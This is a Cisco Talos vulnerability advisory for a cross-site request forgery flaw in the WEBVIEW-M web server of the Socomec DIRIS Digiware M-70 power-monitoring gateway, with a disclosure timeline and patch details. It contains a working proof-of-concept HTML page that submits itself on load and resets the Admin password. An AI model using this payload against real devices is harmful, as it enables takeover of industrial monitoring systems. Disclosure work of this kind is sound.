A cross-site request forgery (csrf) vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Socomec DIRIS Digiware M-70 1.6.9
DIRIS Digiware M-70 - https://www.socomec.us/en-us/reference/48290222
7.5 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-352 - Cross-Site Request Forgery (CSRF)
The DIRIS Digiware M-50/M-70 gateway functions as the access point for industrial power monitoring systems, providing power supply and communication connection to devices in the electrical installation. It also includes a webserver WEBVIEW-M for the remote visualisation and analysis of measurements and consumption.
The Socomec M70 webserver, known as WEBVIEW-M utilizes cookies to manage user sessions. The session cookie has the SameSite attribute set to Strict which instructs the browser that it should not send the cookie in any cross-site requests. Often, this is a sufficient CSRF prevention measure. However, the WEBVIEW-M implementation does not properly handle the scenario where a request is submitted with no session cookie. If a victim visits a malicious web page while logged in to WEBVIEW-M, the browser will behave correctly in that it will not transmit the sessionid cookie due to the SameSite attribute being set to Strict. When this malicious request is received by the WEBVIEW-M webserver it will be processed as if it was authorized resulting in a successful Cross-site request forgery attack. When the browser sends the malicious request it will be sent within the existing TCP session that has been authenticated. Even though no valid sessionid cookie is included in the malicious request, it will be processed and executed by the WEBVIEW-M webserver.
<html>
<body>
<form id="csrf-form" action="http://192.168.0.4/Authenticate/?ModifyAccount" method="POST">
<input type="hidden" name="REQUEST_ID" value="1">
<input type="hidden" name = "DEVICE_ID" value="0">
<input type="hidden" name = "USERNAME" value="Admin">
<input type="hidden" name = "OLD_PASSWORD" value="">
<input type="hidden" name = "NEW_PASSWORD" value="CSRFAdmin1!">
<input type="submit" value="Submit">
</form>
<script>
// Automatically submit the form when the page loads
window.onload = function() {
document.getElementById('csrf-form').submit();
};
</script>
</body>
</html>
If the victim, logged in as the Cyber Security user of WEBVIEW-M visits the above HTML page from the same browser, the Admin user password will be changed to CSRFAdmin1! allowing the attacker to gain privileges of the Admin user.
Vendor advisory: https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684—Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf
2025-01-13 - Vendor Disclosure
2025-10-01 - Vendor Patch Release
2025-12-01 - Public Release
Discovered by Kelly Patterson of Cisco Talos.